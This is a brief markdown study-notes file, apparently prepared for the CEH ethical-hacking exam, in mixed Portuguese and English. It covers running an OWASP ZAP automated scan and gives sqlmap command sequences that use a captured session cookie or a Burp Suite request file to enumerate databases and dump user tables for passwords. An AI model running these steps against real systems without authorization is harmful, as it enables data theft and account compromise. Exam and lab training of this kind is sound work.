marcelocarnauba/ceh-carnauba/notes05.md

 1- Usar o OWASP ZAP no WIndows -> Automated Scan
 O bicho faz tudo, soh botar a url pura mesmo

+Log in with the given credential.
+Use cookie to extract the password of a user from the table with sqlmap.

+$ sqlmap -u "URL" --cookie="captured cookie of looged in user" --dbs    #for Database
+$ sqlmap -u "URL" --cookie="captured cookie of looged in user" -D *DATABASE NAME* --tables #for Tables of selected Database
+$ sqlmap -u "URL" --cookie="captured cookie of looged in user" -D *DATABASE NAME* -T *TABLE NAME* --colmns #for Column names
+$ sqlmap -u "URL" --cookie="captured cookie of looged in user" -D *DATABASE NAME* -T *TABLE NAME* --dump #dump t

+Find any input parameter on website and capture the request in burp and then use it to perform sql injection using sqlmap

+sqlmap -r <txt file from burpsuite> -D <database name> --tables sqlmap -r <txt file from burpsuite> -D <database name> --tables --columns sqlmap -r <txt file from burpsuite> -D <database name> --dump sqlmap -r <txt file from burpsuite> -D <database name> --tables -T users

 ```
 # Malware ELF